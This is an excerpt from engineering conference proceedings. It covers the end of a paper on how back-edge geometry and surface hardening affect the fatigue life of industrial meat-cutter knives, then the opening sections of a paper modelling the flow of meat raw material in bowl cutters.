Visualization of simulation results for a particular case (Seydelmann brand knife) is shown in Fig. 13. The simulation results are shown in Fig. 14, 15, 16, 17, 18 and 19. It has been established that for Seydelmann knife (Fig. 14), the use of a rounded radius R with the size from 0.5 mm to 2.5 mm (with a knife thickness of 5 mm) leads to an increase of initial life duration with 2.49·103 cycles of deformation to the value from 2.63·103 to 2.87·103 deformation cycles. The maximum life duration is observed with a maximum rounded radius R = 2.5 mm. The use of chamfer C with a value from 0.5 mm to 2.5 mm leads to an increase of initial life duration to a value from 2.64·103 to 2.88·103 deformation cycles. The maximum life duration is observed with a chamfer value of C = 2.0 mm. The use of rounding in the form of an ellipse increases the life duration of the knife to 2.78·103 cycles of deformation (for a horizontal ellipse 6.25 × 2.50 mm), 2.86·103 cycles of deformation (for a horizontal ellipse 4.00 × 2.50 mm) and up to the maximum value of 2.92·103 cycles of deformation (for a vertical ellipse 2.50 × 1.50 mm). For the Kilia brand knife (Fig. 15), the nature of the results is different. Since the maximum stresses, unlike most of the considered knives, are observed in zone 2 (according to Fig. 3), a decrease in stress concentration on the back face (in zone 1) does not lead to an increase in the service life of the knife itself. But, despite this, it will be useful to consider the impact of the use of chamfering the back edge on the life of the metal in zone 1 of the knife (according to Fig. 3). The use of both a radius R and a chamfer C of 0.5 to 2.5 mm leads to an increase in the initial service life from 1.00 × 106 deformation cycles to a value from 1.02·106 to 1.07·106 cycles of deformation The use of rounding in the form of an ellipse increases
376
O. Batrachenko
Fig. 13. The results of numerical simulation of the service life of Seydelmann brand knives under alternating loads (the number of loading cycles to destruction) and with different design implementation of the back face: (a) rounding R = 2.50 mm; (b) chamfer C = 2 × 45°; (c) horizontal ellipse 6.25 × 2.50 mm; (d) vertical ellipse 2.5 × 1.50 mm
the service life of the knife to 1.04·106 deformation cycles (for a horizontal ellipse 6.25 × 2,50 mm), 1.06·106 deformation cycles (for a horizontal ellipse 4.00 × 2.50 mm) and up to the maximum value of 1.08·106 deformation cycles (for a vertical ellipse 2.50 × 1.50 mm). For a knife of “Laska universal” brand (Fig. 16), the use of a radius of curvature R of 0.5 mm to 2.5 mm leads to an increase in the initial service life from 2.17·104 cycles of deformation to a value from 2.18·104 to 2.33·104 deformation cycles. The maximum service life is observed at the maximum radius of curvature R = 2.5 mm. The use of the chamfer C with a value of 0.5 mm to 2.5 mm leads to an increase in the initial service
Simulation of Influence of Constructive Parameters
377
Fig. 14. The results of numerical simulation of the number of cycles of deformation to destruction of a Seydelmann knife (knife service life) with various geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.50 × 1.50 mm (4)
Fig. 15. The results of numerical simulation of the number of cycles of deformation to failure of a knife (knife service life) of Kilia brand for various geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.50 × 1.50 mm (4)
life to a value from 2.18·104 to 2.31·104 deformation cycles. The maximum service life is observed when the chamfer value is C = 2 mm. The use of rounding in the form of an ellipse increases the service life of the knife to 2.26·104 deformation cycles (for a horizontal ellipse 6.25 × 2.50 mm), 2.29 × 104 deformation cycles (for a horizontal ellipse 4.00 × 2.50 mm) and up to the maximum value of 2.34 × 104 deformation cycles (for a vertical ellipse 2.50 × 1.50 mm). For a knife of “Laska for raw smoked sausages” brand (Fig. 17), the use of a radius of curvature R of 0.5 to 2.5 mm leads to an increase in the initial service life from 2.42·104 cycles of deformation to a value of 2.56·104 up to 2.78·104 deformation cycles. The maximum service life is observed at the maximum radius of curvature R = 2.5 mm. The use of the chamfer C with a value of 0.5 to 2.5 mm leads to an increase in the initial service life to a value from 2.56·104 to 2.75·104 deformation cycles. The maximum service life is observed when the chamfer value is C = 2 mm. The use of rounding in the form of an ellipse increases the service life of the knife to 2.68·104 deformation cycles (for a horizontal ellipse 6.25 × 2.50 mm), 2.79·104 deformation cycles (for a horizontal
378
O. Batrachenko
Fig. 16. The results of numerical simulation of the number of cycles of deformation to failure of a knife (knife service life) of “Laska universal” brand with different geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.05 × 1.50 mm (4)
ellipse 4.00 × 2.50 mm) and up to the maximum value of 2.83·104 deformation cycles (for a vertical ellipse 2.50 × 1.50 mm).
Fig. 17. The results of numerical simulation of the number of cycles of deformation to destruction of a knife (knife service life) of “Laska for raw smoked sausages” brand with different geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.5 × 1.50 mm (4)
For Alpina brand knife (Fig. 18), the nature of the results differs similarly to the results of Kilia brand knife. Since the maximum stresses are observed in zone 2 (according to Fig. 3), reducing the stress concentration on the back face (in zone 1) does not lead to an increase in the service life of the knife itself. But the use of both the radius of curvature R and the chamfer C with a value from 0.5 mm to 2.5 mm leads to an increase in the initial service life of the metal in zone 1 of the knife (respectively Fig. 3) from 1.00·106 cycles of deformation to a value from 1.02·106 to 1.07·106 strain cycles. The use of rounding in the form of an ellipse increases the service life of the knife to 1.04·106 deformation cycles (for a horizontal ellipse 6.25 × 2.50 mm), 1.06·106 deformation cycles (for a
Simulation of Influence of Constructive Parameters
379
horizontal ellipse 4.00 × 2.50 mm) and up to a maximum value of 1.08·106 deformation cycles (for a vertical ellipse 2.50 × 1.50 mm).
Fig. 18. The results of numerical simulation of the number of cycles of deformation to destruction of Alpina brand knife (knife service life) with different geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.5 × 1.50 mm (4)
For the L5-FKB knife (Fig. 19) the use of a radius of curvature R of 0.5 mm to 2.5 mm increases the initial service life from 6.63·105 deformation cycles to a value of 6.76·105 up to 7.10·105 deformation cycles. The maximum service life is observed at the maximum radius of curvature R = 2.5 mm. The use of the chamfer C with a value of 0.5 mm to 2.5 mm leads to an increase in the initial service life to a value of 6.76·105 up to 7.8·105 deformation cycles. The maximum service life is observed at the size of a chamfer C = 2.0 mm. The use of rounding in the form of an ellipse increases the service life of the knife to 6.88·105 cycles of deformation (for a horizontal ellipse 6.25 × 2.50 mm), 7.01·105 cycles of deformation (for a horizontal ellipse 4.00 × 2.50 mm) and up to a maximum value of 7.16·105 cycles of deformation (for a vertical ellipse 2.50 × 1.50 mm). The obtained research results indicate that the shortest service life is typical for knives with the smallest width of the case along the side surface, as well as for those with a pronounced hollow on the back edge (Fig. 10, a, Fig. 11). The geometric shape of the cutting edge and the back edge of the knife, as well as the width of its body, determine in which of the two zones (1 or 2 in accordance with Fig. 3, I) the maximum stresses will occur. So, in knives of Seydelmann, “Laska universal”, “Laska for raw smoked sausages” and L5-FKB brands, the maximum stresses are observed in zone 1. And in knives of Kilia and Alpina brands, maximum stresses occur in zone 2, which is caused by a small curvature of the cutting edge and a significant width of the knife body. Consequently, there is no stress concentrator in the form of a pronounced depression on their rear face, and a body of considerable width perceives increased pressure from the raw material supplied by the cutter bowl and presses on the side surface of the knife. In general, it can be concluded that for cutter knives, it will be beneficial to increase the width of their body in order to reduce peak stresses in the cavity area on the rear
380
O. Batrachenko
Fig. 19. The results of numerical simulation of the number of deformation cycles to failure of L5FKB brand knife (knife service life) with various geometric parameters of the back face: (a) when using rounding (1) and chamfer (2); (b) for a standard knife (1), when using a horizontal ellipse 6.25 × 2.50 mm (2), when using a horizontal ellipse 4.00 × 2.50 mm (3), when using a vertical ellipse 2.50 × 1.50 mm (4)
edge. Moreover, according to the results of studies [19, 20], an increase in the width of the knife body does not noticeably impair the quality of minced meat processing for raw smoked and cooked sausages. Taking into account the information indicated for knives of Seydelmann, Kilia, “Laska universal”, “Laska for raw smoked sausages” brands, we can recommend the following modification of their design, aimed at increasing the width of the knife body (Fig. 20).
Fig. 20. Modification of the design of knives, aimed on the promotion of their vitrivality with familiar trends: (a) Seydelmann; (b) Kilia; (c) “Laska universal”; (d) “Laska for raw smoked sausages”
4.2 Experimental Studies of the Influence of Hardening Treatment Technologies on the Endurance of Samples of Steel In accordance with the method described above, experimental studies of fatigue endurance of cutter knives have been carried out, the design of which is shown in
Simulation of Influence of Constructive Parameters
381
Fig. 2. The results of experimental studies and the results of mathematical modelling to determine fatigue endurance differ by no more than 8%, which makes it possible to consider the results of mathematical modelling adequate. Along with this, an experimental study of the endurance of samples made using the technology of manufacturing cutter knives, as well as samples strengthened by pulsed plasma processing and high-frequency mechanical forging has been carried out. The results obtained are presented in Fig. 21.
Fig. 21. Fatigue curves for specimens made of N680 steel: 1 – ordinary specimen; 2 – reinforced by pulse-plasma treatment; 3 – reinforced by high-frequency mechanical forging
The study of the impact strength of ordinary and hardened samples of N680 steel makes it possible to establish that the impact strength KCU of hardened samples is in the range of 72–74 J/cm2 , which is less than the control sample by a value not exceeding 5%. This allows us to consider it expedient to surface harden the cutter knives by highfrequency mechanical forging, since the impact strength of the knives does not noticeably deteriorate in this case. An analysis of the known methods of hardening cutter knives has shown that the existing methods of heat treatment of knives are not able to meet a number of requirements for them, which in a certain sense contradict one another – high knife rigidity (to ensure increased wear resistance of the blade, increased fatigue endurance of the body and improved corrosion resistance) and at the same time increased the toughness of the knife body in order to improve the resistance of the knife to impact loads during high-speed cutting. In order to solve this problem, we have developed a new way to harden cutter knives (Fig. 22). It consists in the fact that the entire knife is first annealed to the full depth, then it is normalized or improved to HB200-350 hardness to the full depth. After that, the blade 1 is hardened to the full depth to a hardness of HRCe 52–66 with appropriate
382
O. Batrachenko
tempering (for example, by induction hardening with high-frequency currents, plasma hardening, etc.).
Fig. 22. The device of the cutter knife, reinforced according to the developed method: (a) general view of the knife; (b) cross section of the working part of the knife; (c) cross section of the landing part of the knife; 1 – blade; 2 – working part; 3 – landing part; 4 – rear edge; 5 – surface layers of the working part; 6 – core.
Then the surface strengthening of other Sects. 4, 5 of the knife is made to a depth of 0.03–2 mm by high-frequency mechanical forging. Next, polishing of all surfaces of the knife is carried out, including blade 1, working part 2, landing part 3 and rear edge 4, designed to mix the raw materials during the reverse rotation of the knife. At the same time, hardening of the blade 1 increases its wear resistance. Normalization or improvement of the core 6 of the landing part 3 and the core 6 of the working part 2 of the knife increases its toughness, which is favorable for the working conditions of the knife when cutting. Strengthening the surface layers 5 of the working part of the knife 2 increases fatigue strength and corrosion resistance of these areas. Strengthening the surface layers 5 of the landing part 3 increases their resistance to corrosion and wear under fretting conditions. Polishing all surfaces of the knife increases their fatigue endurance and corrosion resistance. As a result, the most effective combination of the working properties of the cutter knife becomes possible in comparison with known analogues.
Simulation of Influence of Constructive Parameters
383
5 Discussion In summary, it can be noted that all the studied design ways to reduce the concentration of stresses can provide a significant increase in the service life of knives. At the same time rounding in the form of a vertical ellipse of 2.5 × 1.5 mm has the highest efficiency (adds 17% of endurance), however such geometry will cause deterioration of manufacturability of manufacturing of a knife, and consequently, its rise in price. The use of a chamfer of C = 2 mm leads to an increase in endurance by 16% and reduces the cost of processing the back face. The use of rounding with a radius of R = 2.5 mm increases endurance by 15%. Finally, the choice of one or another rounding method should be based on technological capabilities of the enterprise producing cutter knives. So, if the enterprise has CNC milling machines, it would be advisable to use a chamfer on the back edge, which will be easy to obtain by machine, despite the complex configuration of the back edge of the knife. If the reduction in stress concentration will be implemented manually, then it is better to choose a rounding with a radius R or in the form of a vertical ellipse, which will be quite easy to implement by processing the rear edge of the knife with an abrasive wheel when the knife is fed into the processing zone manually. It has been established (Fig. 21) that high-frequency mechanical forging makes it possible to increase the endurance of N680 steel up to 2.5 times, which is explained by the creation of compressive forces in the surface layer of the metal. At the same time, pulse-plasma strengthening leads to a decrease in endurance by 3–3.5 times. This is explained by the fact that, despite the formation of compressive forces in the surface layer of the metal, the endurance of the samples decreases sharply due to the formation of microcracks in the surface layer due to its too intense heating during pulsed plasma hardening. The results presented in the article, such as the dependence of the durability of cutter knives on geometric shape of their blade and back edge, differ from similar results obtained by other researchers, in that they are obtained for knives of different models (of different industrial manufacturers), which are most often used in practice. The value of the obtained results lies in the fact that they can serve as a basis for choosing the most rational structural forms for predicting the durability of knives of new designs that may be developed in the near future. However, during mathematical modelling, the properties of the material of the knives and the properties of their surface layer do not vary. The disclosure of these issues in the future will make it possible to develop sufficiently detailed mathematical models, the use of which will create prerequisites for the effective and rapid design of knives of new designs that will have high work efficiency and increased endurance under the influence of sign-changing loads. The results of mathematical modelling, which reveal the dependence of the durability of knives on the type of rounding of the back edge, are completely different from the known results of research by other researchers, since similar studies are not given in known works at all. The obtained results, in addition to scientific novelty, also have high practical value, since such a cheap technological technique as rounding the back edge can significantly increase fatigue life of knives, up to 17%. At the same time, the brand of knife material and its thickness, and therefore its cost, may remain unchanged.
384
O. Batrachenko
Other authors have not investigated the influence of high-frequency mechanical forging and pulse-plasma hardening to increase fatigue strength of cutter knives. The results obtained in the article are important both from the point of view of scientific novelty and practical value. However, it would be useful to highlight the effectiveness of external treatment of knives by means of high-frequency mechanical forging only in certain zones of the knife, in places of the greatest concentration of stresses in it. In Fig. 3 are zones 1 and 2. In our case, this knife treatment has a significantly reduced cost and, at the same time, sufficient efficiency. It is relevant to continue research in the directions covered in this article.
6 Conclusions The article presents the results of a complex of studies on the identification of the importance of the influence of structural and technological factors on fatigue endurance of cutter knives, as well as the development of recommendations for its improvement. The scientific novelty of the presented work is as follows. For the first time, regularities of influence of geometric parameters of cutter knives on their fatigue endurance are established. It has been proven that increasing the width of the knife body and reducing the concavity of the back edge of the knife contributes to a significant increase in its fatigue endurance. For the first time, regularities of the dependence of the limit of fatigue endurance of cutter knives under alternating loads on the type of strengthening treatment and on the features of geometric shape of the knives have been obtained. High-frequency mechanical forging makes it possible to increase the durability of N680 steel up to 2.5 times, at the same time, pulse plasma hardening leads to a decrease in durability by 3–3.5 times. The practical value of the research results presented in the article is as follows. A set of recommendations is offered to increase fatigue endurance of knives. For cutter knives, it will be beneficial to increase the width of their body in order to reduce the peak stresses in the area of the depression on the rear face and to increase its fatigue endurance. The developed method of strengthening the knives of the cutter allows to obtain the best combination of various operational and technological properties in comparison with analogues due to the use of special heat treatment of its surfaces and the application of surface strengthening with the help of high-frequency mechanical forging. Further research should be devoted to the search for new conceptual design solutions for cutter knives based on modern information about the hydrodynamics of meat raw materials in the cutter. New designs of pre-assembled knives will allow to significantly increase their fatigue endurance and reliability in work without deterioration of the quality of processing of meat raw materials.
References 1. Kolev, E., Stoyanov, S.: Verifikationsmethode zur bestimmung der belastung an bauteilen durch simulation und experiment. Int. Wissenschaftliches Kolloquium 47, 23–26 (2002)
Simulation of Influence of Constructive Parameters
385
2. Moser, M.: Ermudungsbruch von Fleischhackmessern. Kuttermesser (2010). http://martinmoeser.de/Veroeffentlichungen/Bruch_Kuttermesser.pdf. Accessed 30 Mar 2010 3. Markus, L.I., Shatalov, A.N., Ananyev, R.A., Smirnov, A.B.: Computer modeling of the causes of emergency breakage of knives of high-speed cutters. Myasnaya Industr. 8, 19–21 (2010) 4. Nekoz, A.I., Venglovskyi, O.L., Batrachenko, A.V.: Durability of cutter assemblies and its causative factors. Foods Raw Mater. 6, 358–370 (2018) 5. Kokanda, S.: Fatigue Cracking of Metals: Monograph. Metallurgiya, Moscow (1990) 6. Arutyunyan, A.R.: Corrosion crack growth and fatigue strength of complex technical systems. Inzh.-Stroitelnyiy Zh. 9, 42–48 (2013) 7. Stukach, V.N.: Study of the corrosion-fatigue strength of materials for press rolls of paper machines. Vestn. IzhGTU. 3(55), 15–17 (2012) 8. Romano, S., Brückner-Foit, A., Brandão, A., Gumpinger, J., Ghidini, T., Beretta, S.: Fatigue properties of AlSi10Mg obtained by additive manufacturing: defect-based modelling and prediction of fatigue strength. Eng. Fract. Mech. 187, 165–189 (2018) 9. Kamaya, M., Kawakubo, M.: Mean stress effect on fatigue strength of stainless steel. Int. J. Fatigue 74, 20–29 (2015) 10. Zerbst, U., Vormwald, M., Pippan, R., Gänser, H., Sarrazin-Baudoux, C., Madia, M.: About the fatigue crack propagation threshold of metals as a design criterion – a review. Eng. Fract. Mech. 153, 190–243 (2016) 11. Agrawal, A., Deshpande, P.D., Cecen, A., Basavarsu, G.P., Choudhary, A.N., Kalidindi, S.R.: Exploration of data science techniques to predict fatigue strength of steel from composition and processing parameters. Integrating Mater. Manufact. Innov. 3(1), 90–108 (2014). https:// doi.org/10.1186/2193-9772-3-8 12. Zerbst, U., Madia, M., Beier, H.: A model for fracture mechanics based prediction of the fatigue strength: further validation and limitations. Eng. Fract. Mech. 130, 65–74 (2014) 13. Madia, M., Zerbst, U.: Application of the cyclic R-curve method to notch fatigue analysis. Int. J. Fatigue 82, 71–79 (2016) 14. Beretta, S., Romano, S.: A comparison of fatigue strength sensitivity to defects for materials manufactured by AM or traditional processes. Int. J. Fatigue 94, 178–191 (2017) 15. Caligulu, U.: The fatigue strength of AISI 430–304 stainless steels welded by CO2 laser beam welding. Metallphysycs 6, 839–852 (2015) 16. Vishnepolskiy, E.V., Puhalskaya, G.V., Glikson, I.L.: Increasing the fatigue resistance of stress concentration points in cylindrical shells by diamond burnishing. Vestn. Dvigatelestroyenia 1, 90–94 (2009) 17. Knyish, V.V., Solovey, S.A.: Increasing the durability of welded joints with fatigue damage: monograph. KPI im. Igorya Sikorskogo, Kiev (2017) 18. Tyurin, Y.N., Zhadkevich, M.L.: Plasma Hardening Technologies. Naukova dumka, Kiev (2008) 19. Schnackel, W., Micklisch, I., Krickmeier, J.: Untersuchungen zur Optimierung von Kuttermessern. 3. Optierugen der Kuttermessform Zur Herstellung von Bruhwursten. Fleischwirtschaft 6, 86–102 (2008) 20. Schnackel, W., Micklisch, I., Krickmeier, J.: Optimisation of cutter knives for the production of cooked sausages. Food Science, Engineering and Technologies, Plovdiv (2008)
Modelling of Hydrodynamics of Meat Raw Materials When Crushing It in Meat Cutting Machines Olexandr Batrachenko(B) Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. The aim of the work is to study by numerical methods the hydrodynamics of raw materials during its grinding in bowl cutters, meat grinder and emulsifiers to justify new ways to increase the productivity of these machines. Numerical modelling of raw meat movement parameters in the bowl cutter has been performed using the SolidWorks FlowSimulation software package. The raw material, after being discarded with knives at high speed, leaves the grinding zone at an angle of 20°–35° to the axis of rotation of the knives. Then the flow of raw materials hits the wall of the bowl and moves along its walls and lid. The presence in the bowl cutter of a clear zone of rejection of raw materials with high-speed knives allows us to offer a solution for placing static knives in this area to intensify the cutting process, and without unnecessary energy consumption. Keywords: Simulation · bowl cutter · knives · hydrodynamics · capacity · durability
1 Introduction The development of technology, its improvement is a process of continuous transfer of the economy to a new level of technology and society to a new stage of technological progress. In this context, a necessary condition for the successful development of the food industry is the improvement of technological equipment in order to increase the efficiency of processing raw materials and reduce operating costs. It is especially important to fulfill these requirements in the meat processing industry. The high cost of raw materials necessitates high-quality processing in order to reduce losses, and the widespread use of grinding operations, their significant energy consumption and the specific effect of the properties of raw materials on the wear processes of working bodies cause significant operating costs for the maintenance and repair of process equipment. Our analysis makes it possible to establish that in modern models of cutters, the specific productivity (productivity related to the diameter of the cutting unit of the machine), the quality of processing of raw materials (the level of increase in the temperature of raw materials during grinding, its moisture content), the durability of working bodies, high energy consumption of work (kW h/kg). © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 386–410, 2023. https://doi.org/10.1007/978-3-031-35467-0_24
Modelling of Hydrodynamics of Meat Raw Materials
387
We put forward a hypothesis that certain features of the hydrodynamics of raw materials in the working area of cutters significantly reduce their maximum achievable specific productivity and cause a degraded quality of semi-finished products obtained. The specific nature of the movement of raw materials and its physical and mechanical properties have a significant impact on the wear resistance, strength and fatigue endurance of the working bodies. The study and proper consideration of these phenomena will increase the output of meat products without increasing capital and operating costs for the maintenance of technological equipment and improve the quality of raw material processing. Increasing the durability and reducing the metal consumption of working bodies will increase the actual productivity of machines due to a reduction in the number of unscheduled repairs. It will also be possible to reduce the existing operating costs for the cutting tool, the cost of which for these types of equipment is significantly high. This work is based on the concept of improving machines for grinding meat raw materials, previously developed by the author, based on the systemic mutual coordination of the processes of supplying raw meat and the processes of its grinding. The essence of the concept is that the parameters of the feeding and grinding system are determined and coordinated, ensuring the maximum overall efficiency of the process, including the stress-strain state of the working bodies (knives). This work is devoted to highlighting these aspects. The following scientific works are devoted to the study of these problematic issues. The article [1] assesses microstructural, physicochemical, and organoleptic properties of buffalo cutlets made using various mixing equipment (bowl cutter, universal mixer and meat grinder). Scanning electron microscopy has revealed a more homogeneous emulsion, cohesive structure, and smaller pore size of patties cooked using a bowl cutter, which significantly reduces the overall liquid release, water release, fat release, and cooking loss compared to the universal mixer and mincer. The production of buffalo meat patties using the bowl cutter also improves the moisture retention and gel strength of the patties. The aim of the study [2] is to develop a mathematical model for mixing salt and meat in a bowl cutter and test it with experimental data. The theoretical model has shown that 30 rotations of the bowl is enough to obtain the salt concentration in the entire mass of meat with a deviation between the maximum and minimum values of about 5%. Comparison of theoretically predicted salt gradient and experimental results has shown that the developed mathematical equation is suitable for describing the process. However, the study of the hydrodynamics of meat in the cutter is not carried out in this article. Of considerable interest are the results of a study of the efficiency of individual knives in the cutter head [3, 4]. The authors have used in their work high-speed filming of the cutting head operation. Despite the significance of the results obtained, they are characterized by such shortcomings as low information content in these publications and the inability to explain the results of experimental studies of the efficiency of knives [3, 4, 6]. According to these results, the knives that are installed in the first cutting plane account for about 50% of cutter’s productivity, and the knives that are installed in the other two cutting planes also account for about 50% of cutter’s productivity.
388
O. Batrachenko
A significant number of works have been devoted to the study of temperature increase during cutting. Researchers [7] use thermal imaging devices in their work, in contrast to electrical contact thermometers. This allows them to establish the temperature distribution of both raw materials and structural parts of the cutter (knives, bowl lid). The aim of the research is to identify the main factor leading to the heating of minced meat with knives. However, the authors note that they haven’t established a clear relationship between the effect of knives friction on raw materials on the degree of its heating, which is observed during cutting. In our opinion, the probable reason for this result is that the researchers do not take into account in their work such a minced meat heating factor as intense friction and impact on the walls of the bowl and the cover of the cutter head after the blades of the knives are thrown away during grinding. A proper study of these problematic tasks remains very relevant. In the works [8, 9] the results of studies of the influence of the shape of the blade of cutter knives and their width on the performance of the cuttering process and the quality of the minced meat obtained are given. It has been established that the increased width of the knife leads to increased heating of the minced meat and to a softer consistency of the product, which is a negative factor. These results should be taken into account when developing new knife designs with increased work efficiency. The authors of [10] propose a new configuration of the knife of a meat chopping machine and investigate the efficiency of its use. The main idea of the design is to coordinate the locations of the blades with the areas of the main flows of meat raw materials in this machine. However, it is impossible to apply these solutions specifically cutter knives. In [11], the results of studies on the use of a new type of device for supplying meat raw materials to the cutting set of the machine are presented. In the developed design of the device, the number of zones of intensive supply of meat raw materials is doubled, which results in an increase in its productivity without increasing the diameter of the cutting set. In [12], the results of mathematical modelling and experimental studies of the hydrodynamics of meat raw materials in a meat cutting machine are presented. It is shown that the design and kinematic parameters of the feeding unit and the cutting set have a significant impact on the performance of the meat cutting machine.The authors [13] have studied the efficiency of supplying raw meat to the cutting set of a meat cutting machine using a device, the base of which is a metal sleeve with spiral holes. It has been established that this device is capable of efficiently supplying meat raw materials, despite the lower cost of its manufacture compared to standard devices. In the works [13, 15], the parameters of the process of supplying raw materials through the elements of the cutting set are investigated. Despite the importance and weight of the results of the above works, they cannot be considered exhaustive and capable of increasing the productivity of the cutter, improving the quality of processing of raw materials in it, reducing energy consumption for the cuttering process and increasing the durability of its cutting set. The works [16, 17] are devoted to the study of the durability of cutter knives. In [16], a list of factors affecting the insufficient strength of knives is disclosed, attention is focused on the presence of two main zones of stress concentration in knives, one of which lies on the back edge of the knife. This information is extremely important for making decisions on the design improvement of knives, but the authors of [16] do
Modelling of Hydrodynamics of Meat Raw Materials
389
not provide such decisions in the article itself. The work [17] presents the results of mathematical modelling of the stress-strain state of cutter knives, however, it does not match the parameters of the process of supplying meat raw materials to cutters and the parameters of the stress-strain state of the knives. Also, the authors don’t propose ways to increase the static strength of cutter knives. In general, it can be stated that the well-known literary sources do not contain the results of studies that could increase the productivity of the cutter, improve the quality of processing of raw materials in it, reduce energy consumption for the cuttering process and increase the durability of knives due to the mutual coordination of the processes of feeding and grinding meat in the cutter. The aim of the work is to substantiate, with the help of numerous and full-scale experiments, new ways to increase the productivity of the cutter, improve the quality of processing of raw materials in it, reduce energy consumption for the cuttering process and increase the durability of knives by coordinating the processes of feeding and crushing meat into cutters. To achieve the goal, the following tasks are set: – to analyze well-known studies on improving the efficiency of the process of grinding meat raw materials in a cutter; – to develop methods for studying the processes occurring during the interaction of the working bodies of the cutter with raw meat during its grinding; – to establish the features of the hydrodynamics of meat raw materials in the working area of the cutter; – to propose a method for coordinating the parameters of the processes of feeding and grinding meat raw materials in order to increase the productivity of the cutter, improve the quality of processing of raw materials in it, and reduce energy consumption for the cuttering process; – to reveal the regularities of the influence of the parameters of cutter knives interaction with meat raw materials on their stress-strain state; – to develop new designs of cutter knives with increased efficiency of raw material processing and increased strength. Objects of Study: The processes of feeding and grinding meat raw materials in cutters, the stress-strain state of their knives. Subject of Study: Regularities of the influence of the design and kinematic characteristics of the working bodies of cutters on the processes of hydrodynamics of raw material and the process of its grinding, their interdependence, mutual agreement and influence on the efficiency of cutting and the stress-strain state of the working bodies (knives).
2 Materials and Methods The basis of this work is the results obtained in the numerical simulation of the processes accompanying the operation of the cutter. And to verify the results obtained, full-scale experimental studies are used on industrial equipment (cutters) in the conditions of an operating meat processing enterprise. Therefore, research methods are divided accordingly.
390
O. Batrachenko
In order to determine the features and parameters of the hydrodynamics of meat raw materials in the working area of the cutter, the parameters of the movement of meat raw materials are simulated using the SolidWorks FlowSimulation software package. Schemes of calculation areas are shown in Fig. 1, 2 and 3.
Fig. 1. Calculation area when simulating the adhesive interaction of a cutter knife with meat raw materials
Fig. 2. Calculation area when simulating the flow around cutter knife with meat raw materials
This software package is intended for modelling three-dimensional flows of liquids and gases in technical and natural objects, as well as for visualizing these flows using computer graphics methods. Flows can be: stationary and non-stationary (changing with time), compressible, weakly compressible and incompressible. The complex is based on a finite-volume method for solving hydrodynamic equations and uses a rectangular adaptive grid with local refinement. To approximate curvilinear geometry with increased accuracy, subgrid geometry separation technology is used. The process of fluid motion simulation is carried out in stages: 1) creation of a calculation area in CAD SolidWorks and automatic import of the model into the FlowSimulation module in the SolidWorks environment; 2) problems of the form of a mathematical model (laminar flow; non-Newtonian fluid, etc.);
Modelling of Hydrodynamics of Meat Raw Materials
391
Fig. 3. Calculation area when simulating the movement of meat raw materials after cutter head
3) setting the boundary conditions (indicating the direction of the fluid flow and restrictive surfaces); 4) setting the kinematic parameters of the working body and physical and mechanical parameters of meat raw materials (speed of rotation of the knives and the cutter bowl, speed of the knife, liquid density, liquid viscosity, etc.); 5) task of the computational grid (a grid with a second level of local grinding is used in the contact zones of the knife surface with raw meat); 6) setting the parameters of calculation methods (number of iterations – 2,000, accuracy – 0.01, the second order of accuracy is used for speed, the CGM method is used for pressure); 7) carrying out the calculation; 8) presentation of calculation results in graphical form (visualization of calculation results) and data storage in files.
3 Experiments We have used high-speed video filming and thermography of the cuttering process in a Laska KR-330-2V cutter. The Laska KR-330-2V cutter is designed for preliminary and fine grinding of meat raw materials (Fig. 4). The volume of the cutter bowl is 330 l. The knife head consists of 6 sickle-shaped knives. The frequency of rotation of the cutter head is 740; 1,475; 2,950 min−1 . The frequency of rotation of the bowl is 9; 18 min−1 . The cutter is vacuum, the depth of vacuum created in the working area of the cutter is up to 0.8. The power of the electric motor of a drive of a knife shaft is 110 kW. The process of studying the features of the hydrodynamics of raw materials in the working areas of the machines is carried out by performing high-speed video filming of the process of movement of meat raw materials through the corresponding working areas. The study scheme is shown in Fig. 5.
392
O. Batrachenko
Fig. 4. Laska KR-330-2V cutter: (a), (b) view from the side of the cutter head: 1, 2 – knives of the first cutting plane; 3, 4 – knives of the second cutting plane; 5, 6 – knives of the third cutting plane
The following equipment has been used for this: • • • • •
Sony FS700 digital video camera; Odyssey 7Q Convergent Design recorder; Sony SEL-18200 OSS lens; Manfrotto TR 546B tripod; Lilliput 969 A/O/P LCD video monitor 9.7 .
This set of equipment allows you to shoot video with quality from FullHD to 4k. During the research, video recording has been used at a speed of 960 frames per second, with a resolution of 1920 × 216 pixels.
Fig. 5. Scheme of an experimental study of the intensity of feeding of raw materials by separate zones of the last turn of the top screw: 1 – cutter; 2 – searchlight; 3 – tripod; 4 – video camera; 5 – recorder; 6 – monitor; 7 – personal computer
Modelling of Hydrodynamics of Meat Raw Materials
393
Thermography of the surface of raw materials and equipment elements during processing has been carried out using a digital thermal imager, a personal computer and software. ULRivionTI384 thermal imager (infrared camera) is an optoelectronic device operating in the infrared region of the electromagnetic spectrum. The high-quality uncooled matrix of the TI384 thermal imager, with a resolution of 384x288 pixels, allows you to get a clear infrared image and accurate poetry of the temperature of various objects of animate and inanimate nature. Special range – 8–14 mm. Standard lens – 21° × 15°/f – 0,15 m. Sensitivity – −0,1 °C at 30 °C. Measuring range – from –20 °C to + 120 °C. Measurement accuracy – ±2 °C or ±2%. Specialized IRSee software allows quantitative measurement of temperature at any point of a digital photograph taken by the ULIRvisionTI384 thermal imager.
